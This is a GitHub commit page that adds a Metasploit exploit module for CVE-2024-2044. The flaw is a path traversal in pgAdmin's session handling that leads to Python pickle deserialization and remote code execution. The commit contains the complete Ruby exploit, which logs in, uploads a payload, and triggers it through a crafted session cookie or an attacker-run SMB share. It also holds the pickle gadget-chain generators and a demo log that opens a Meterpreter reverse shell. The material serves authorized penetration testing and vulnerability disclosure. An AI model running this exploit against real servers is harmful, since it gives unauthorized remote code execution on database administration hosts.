-
Notifications
You must be signed in to change notification settings - Fork 14.1k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Land #19026, Add pgadmin exploit CVE-2024-2044
This adds an exploit for pgAdmin <= 8.3 which is a path traversal vulnerability in the session management that allows a Python pickle object to be loaded and deserialized. This also adds a new Python deserialization gadget chain to execute the code in a new thread so the target application doesn't block the HTTP request.
- Loading branch information
Showing
7 changed files
with
364 additions
and
2 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
94 changes: 94 additions & 0 deletions
94
documentation/modules/exploit/multi/http/pgadmin_session_deserialization.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,94 @@ | ||
## Vulnerable Application | ||
pgAdmin versions <= 8.3 have a path traversal vulnerability within their session management logic that can allow a | ||
pickled file to be loaded from an arbitrary location. This can be used to load a malicious, serialized Python object to | ||
execute code within the context of the target application. | ||
|
||
This exploit supports two techniques by which the payload can be loaded, depending on whether or not credentials are | ||
specified. If valid credentials are provided, Metasploit will login to pgAdmin and upload a payload object using | ||
pgAdmin's file management plugin. Once uploaded, this payload is executed via the path traversal before being deleted | ||
using the file management plugin. This technique works for both Linux and Windows targets. If no credentials are | ||
provided, Metasploit will start an SMB server and attempt to trigger loading the payload via a UNC path. This technique | ||
only works for Windows targets. For Windows 10 v1709 (Redstone 3) and later, it also requires that insecure outbound | ||
guest access be enabled. | ||
|
||
## Verification Steps | ||
|
||
1. Install the application | ||
1. Start msfconsole | ||
1. Do: `use exploit/multi/http/pgadmin_session_deserialization` | ||
1. Set the `RHOST`, `PAYLOAD`, and optionally the `USERNAME` and `PASSWORD` options | ||
1. Do: `run` | ||
|
||
### Installation (Docker on Linux) | ||
|
||
A docker instance can be started using the following command. It'll start on port 8080 with an initial account for | ||
`[email protected]`. Additional accounts can be created through the web UI. | ||
|
||
``` | ||
docker run -p 8080:80 \ | ||
-e '[email protected]' \ | ||
-e 'PGADMIN_DEFAULT_PASSWORD=Password1!' \ | ||
-d dpage/pgadmin4:8.3 | ||
``` | ||
|
||
### Installation (Windows) | ||
|
||
These steps are the bare minimum to get the application to run for testing and should not be use for a production setup. | ||
For a production setup, a server like Apache should be setup to run pgAdmin through it's WSGI interface. | ||
|
||
**The following paths are all relative to the default installation path `C:\Program Files\pgAdmin 4\web`**. | ||
|
||
1. [Download][1] and install the Windows build | ||
1. Copy the `config_distro.py` file to `config_local.py` | ||
1. Edit `config_local.py` and set `SERVER_MODE` to `True` | ||
1. Upgrade pip: `..\python\python.exe -m pip upgrade` | ||
1. Install python package required by `setup.py`: `..\python\python.exe -m pip install "psycopg[binary,pool]"` | ||
1. Initialize the database: `..\python\python.exe setup.py setup-db` | ||
1. Create an initial user account: `..\python\python.exe setup.py add-user --admin [email protected] Password1!` | ||
1. Run the application: `..\python\python.exe pgAdmin4.py` | ||
|
||
## Scenarios | ||
Specific demo of using the module that might be useful in a real world scenario. | ||
|
||
### pgAdmin 8.3 on Docker | ||
|
||
``` | ||
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set RHOSTS 192.168.250.134 | ||
RHOSTS => 192.168.250.134 | ||
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set RPORT 8080 | ||
RPORT => 8080 | ||
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set SSL false | ||
[!] Changing the SSL option's value may require changing RPORT! | ||
SSL => false | ||
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set USERNAME [email protected] | ||
USERNAME => [email protected] | ||
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set PASSWORD Password1! | ||
PASSWORD => Password1! | ||
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set PAYLOAD python/meterpreter/reverse_tcp | ||
PAYLOAD => python/meterpreter/reverse_tcp | ||
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set LHOST 192.168.250.134 | ||
LHOST => 192.168.250.134 | ||
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > run | ||
[*] Started reverse TCP handler on 192.168.250.134:4444 | ||
[*] Running automatic check ("set AutoCheck false" to disable) | ||
[+] The target appears to be vulnerable. pgAdmin version 8.3.0 is affected | ||
[*] Successfully authenticated to pgAdmin | ||
[*] Serialized payload uploaded to: /var/lib/pgadmin/storage/zeroSteiner_gmail.com/reiciendis.pages | ||
[*] Triggering deserialization for path: ../storage/zeroSteiner_gmail.com/reiciendis.pages | ||
[*] Sending stage (24768 bytes) to 192.168.250.134 | ||
[*] Meterpreter session 1 opened (192.168.250.134:4444 -> 192.168.250.134:45930) at 2024-03-29 12:01:04 -0400 | ||
meterpreter > getuid | ||
Server username: pgadmin | ||
meterpreter > sysinfo | ||
Computer : 27b165126272 | ||
OS : Linux 6.7.9-200.fc39.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Mar 6 19:35:04 UTC 2024 | ||
Architecture : x64 | ||
Meterpreter : python/linux | ||
meterpreter > pwd | ||
/pgadmin4 | ||
meterpreter > | ||
``` | ||
|
||
[1]: https://www.postgresql.org/ftp/pgadmin/pgadmin4/v8.3/windows/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,9 @@ | ||
import pickle | ||
|
||
class GadgetChain: | ||
def __reduce__(self): | ||
return __builtins__.exec, ('#{escaped}',) | ||
|
||
if __name__ == '__main__': | ||
pickled = pickle.dumps(GadgetChain(), protocol=0) | ||
print(repr(pickled.decode())) |
14 changes: 14 additions & 0 deletions
14
external/source/python_deserialization/py3_exec_threaded.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,14 @@ | ||
import pickle | ||
import threading | ||
|
||
class CreateThread: | ||
def __reduce__(self): | ||
return threading.Thread, (None, __builtins__.exec, None, ('#{escaped}',)) | ||
|
||
class GadgetChain: | ||
def __reduce__(self): | ||
return threading.Thread.start, (CreateThread(),) | ||
|
||
if __name__ == '__main__': | ||
pickled = pickle.dumps(GadgetChain(), protocol=0) | ||
print(repr(pickled.decode())) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
239 changes: 239 additions & 0 deletions
239
modules/exploits/multi/http/pgadmin_session_deserialization.rb
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,239 @@ | ||
# This module requires Metasploit: https://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
|
||
class MetasploitModule < Msf::Exploit::Remote | ||
Rank = ExcellentRanking | ||
|
||
prepend Msf::Exploit::Remote::AutoCheck | ||
include Msf::Exploit::Remote::HttpClient | ||
include Msf::Exploit::Remote::SMB::Server::Share | ||
|
||
def initialize(info = {}) | ||
super( | ||
update_info( | ||
info, | ||
'Name' => 'pgAdmin Session Deserialization RCE', | ||
'Description' => %q{ | ||
pgAdmin versions <= 8.3 have a path traversal vulnerability within their session management logic that can allow | ||
a pickled file to be loaded from an arbitrary location. This can be used to load a malicious, serialized Python | ||
object to execute code within the context of the target application. | ||
This exploit supports two techniques by which the payload can be loaded, depending on whether or not credentials | ||
are specified. If valid credentials are provided, Metasploit will login to pgAdmin and upload a payload object | ||
using pgAdmin's file management plugin. Once uploaded, this payload is executed via the path traversal before | ||
being deleted using the file management plugin. This technique works for both Linux and Windows targets. If no | ||
credentials are provided, Metasploit will start an SMB server and attempt to trigger loading the payload via a | ||
UNC path. This technique only works for Windows targets. For Windows 10 v1709 (Redstone 3) and later, it also | ||
requires that insecure outbound guest access be enabled. | ||
Tested on pgAdmin 8.3 on Linux, 7.7 on Linux, 7.0 on Linux, and 8.3 on Windows. The file management plugin | ||
underwent changes in the 6.x versions and therefor, pgAdmin versions < 7.0 can not utilize the authenticated | ||
technique whereby a payload is uploaded. | ||
}, | ||
'Author' => [ | ||
'Spencer McIntyre', # metasploit module | ||
'Davide Silvetti', # vulnerability discovery and write up | ||
'Abdel Adim Oisfi' # vulnerability discovery and write up | ||
], | ||
'License' => MSF_LICENSE, | ||
'References' => [ | ||
['CVE', '2024-2044'], | ||
['URL', 'https://www.shielder.com/advisories/pgadmin-path-traversal_leads_to_unsafe_deserialization_and_rce/'], | ||
['URL', 'https://github.com/pgadmin-org/pgadmin4/commit/4e49d752fba72953acceeb7f4aa2e6e32d25853d'] | ||
], | ||
'Stance' => Msf::Exploit::Stance::Aggressive, | ||
'Platform' => 'python', | ||
'Arch' => ARCH_PYTHON, | ||
'Payload' => {}, | ||
'Targets' => [ | ||
[ 'Automatic', {} ], | ||
], | ||
'DefaultOptions' => { | ||
'SSL' => true, | ||
'WfsDelay' => 5 | ||
}, | ||
'DefaultTarget' => 0, | ||
'DisclosureDate' => '2024-03-04', # date it was patched, see: https://github.com/pgadmin-org/pgadmin4/commit/4e49d752fba72953acceeb7f4aa2e6e32d25853d | ||
'Notes' => { | ||
'Stability' => [ CRASH_SAFE, ], | ||
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ], | ||
'Reliability' => [ REPEATABLE_SESSION, ] | ||
} | ||
) | ||
) | ||
|
||
register_options([ | ||
OptString.new('TARGETURI', [true, 'Base path for pgAdmin', '/']), | ||
OptString.new('USERNAME', [false, 'The username to authenticate with (an email address)', '']), | ||
OptString.new('PASSWORD', [false, 'The password to authenticate with', '']) | ||
]) | ||
end | ||
|
||
def check | ||
version = get_version | ||
return CheckCode::Unknown('Unable to determine the target version') unless version | ||
return CheckCode::Safe("pgAdmin version #{version} is not affected") if version >= Rex::Version.new('8.4') | ||
|
||
CheckCode::Appears("pgAdmin version #{version} is affected") | ||
end | ||
|
||
def csrf_token | ||
return @csrf_token if @csrf_token | ||
|
||
res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'login'), 'keep_cookies' => true) | ||
set_csrf_token_from_login_page(res) | ||
fail_with(Failure::UnexpectedReply, 'Failed to obtain the CSRF token') unless @csrf_token | ||
@csrf_token | ||
end | ||
|
||
def set_csrf_token_from_login_page(res) | ||
if res&.code == 200 && res.body =~ /csrfToken": "([\w+.-]+)"/ | ||
@csrf_token = Regexp.last_match(1) | ||
# at some point between v7.0 and 7.7 the token format changed | ||
elsif (element = res.get_html_document.xpath("//input[@id='csrf_token']")&.first) | ||
@csrf_token = element['value'] | ||
end | ||
end | ||
|
||
def get_version | ||
res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'login'), 'keep_cookies' => true) | ||
return unless res&.code == 200 | ||
|
||
html_document = res.get_html_document | ||
return unless html_document.xpath('//title').text == 'pgAdmin 4' | ||
|
||
# there's multiple links in the HTML that expose the version number in the [X]XYYZZ, | ||
# see: https://github.com/pgadmin-org/pgadmin4/blob/053b1e3d693db987d1c947e1cb34daf842e387b7/web/version.py#L27 | ||
versioned_link = html_document.xpath('//link').find { |link| link['href'] =~ /\?ver=(\d?\d)(\d\d)(\d\d)/ } | ||
return unless versioned_link | ||
|
||
set_csrf_token_from_login_page(res) # store the CSRF token because we have it | ||
Rex::Version.new("#{Regexp.last_match(1).to_i}.#{Regexp.last_match(2).to_i}.#{Regexp.last_match(3).to_i}") | ||
end | ||
|
||
def exploit | ||
if datastore['USERNAME'].present? | ||
exploit_upload | ||
else | ||
exploit_remote_load | ||
end | ||
end | ||
|
||
def exploit_remote_load | ||
start_service | ||
print_status('The SMB service has been started.') | ||
|
||
# Call the exploit primer | ||
self.file_contents = Msf::Util::PythonDeserialization.payload(:py3_exec_threaded, payload.encoded) | ||
trigger_deserialization(unc) | ||
end | ||
|
||
def exploit_upload | ||
res = send_request_cgi({ | ||
'uri' => normalize_uri(target_uri.path, 'authenticate/login'), | ||
'method' => 'POST', | ||
'keep_cookies' => true, | ||
'vars_post' => { | ||
'csrf_token' => csrf_token, | ||
'email' => datastore['USERNAME'], | ||
'password' => datastore['PASSWORD'], | ||
'language' => 'en', | ||
'internal_button' => 'Login' | ||
} | ||
}) | ||
|
||
unless res&.code == 302 && res.headers['Location'] != normalize_uri(target_uri.path, 'login') | ||
fail_with(Failure::NoAccess, 'Failed to authenticate to pgAdmin') | ||
end | ||
print_status('Successfully authenticated to pgAdmin') | ||
|
||
serialized_data = Msf::Util::PythonDeserialization.payload(:py3_exec_threaded, payload.encoded) | ||
|
||
file_name = Faker::File.file_name(dir: '', directory_separator: '') | ||
file_manager_upload(file_name, serialized_data) | ||
trigger_deserialization("../storage/#{datastore['USERNAME'].gsub('@', '_')}/#{file_name}") | ||
file_manager_delete(file_name) | ||
end | ||
|
||
def trigger_deserialization(path) | ||
print_status("Triggering deserialization for path: #{path}") | ||
send_request_cgi({ | ||
'uri' => normalize_uri(target_uri.path, 'login'), | ||
'cookie' => "pga4_session=#{path}!" | ||
}) | ||
end | ||
|
||
def file_manager_init | ||
res = send_request_cgi({ | ||
'uri' => normalize_uri(target_uri.path, 'file_manager/init'), | ||
'method' => 'POST', | ||
'keep_cookies' => true, | ||
'ctype' => 'application/json', | ||
'headers' => { 'X-pgA-CSRFToken' => csrf_token }, | ||
'data' => { | ||
'dialog_type' => 'storage_dialog', | ||
'supported_types' => ['sql', 'csv', 'json', '*'], | ||
'dialog_title' => 'Storage Manager' | ||
}.to_json | ||
}) | ||
unless res&.code == 200 && (trans_id = res.get_json_document.dig('data', 'transId')) | ||
fail_with(Failure::UnexpectedReply, 'Failed to initialize a file manager transaction') | ||
end | ||
|
||
trans_id | ||
end | ||
|
||
def file_manager_delete(file_path) | ||
trans_id = file_manager_init | ||
|
||
res = send_request_cgi({ | ||
'uri' => normalize_uri(target_uri.path, "/file_manager/filemanager/#{trans_id}/"), | ||
'method' => 'POST', | ||
'keep_cookies' => true, | ||
'ctype' => 'application/json', | ||
'headers' => { 'X-pgA-CSRFToken' => csrf_token }, | ||
'data' => { | ||
'mode' => 'delete', | ||
'path' => "/#{file_path}", | ||
'storage_folder' => 'my_storage' | ||
}.to_json | ||
}) | ||
unless res&.code == 200 && res.get_json_document['success'] == 1 | ||
fail_with(Failure::UnexpectedReply, 'Failed to delete file') | ||
end | ||
|
||
true | ||
end | ||
|
||
def file_manager_upload(file_path, file_contents) | ||
trans_id = file_manager_init | ||
|
||
form = Rex::MIME::Message.new | ||
form.add_part( | ||
file_contents, | ||
'application/octet-stream', | ||
'binary', | ||
"form-data; name=\"newfile\"; filename=\"#{file_path}\"" | ||
) | ||
form.add_part('add', nil, nil, 'form-data; name="mode"') | ||
form.add_part('/', nil, nil, 'form-data; name="currentpath"') | ||
form.add_part('my_storage', nil, nil, 'form-data; name="storage_folder"') | ||
|
||
res = send_request_cgi({ | ||
'uri' => normalize_uri(target_uri.path, "/file_manager/filemanager/#{trans_id}/"), | ||
'method' => 'POST', | ||
'keep_cookies' => true, | ||
'ctype' => "multipart/form-data; boundary=#{form.bound}", | ||
'headers' => { 'X-pgA-CSRFToken' => csrf_token }, | ||
'data' => form.to_s | ||
}) | ||
unless res&.code == 200 && res.get_json_document['success'] == 1 | ||
fail_with(Failure::UnexpectedReply, 'Failed to upload file contents') | ||
end | ||
|
||
upload_path = res.get_json_document.dig('data', 'result', 'Name') | ||
print_status("Serialized payload uploaded to: #{upload_path}") | ||
|
||
true | ||
end | ||
end |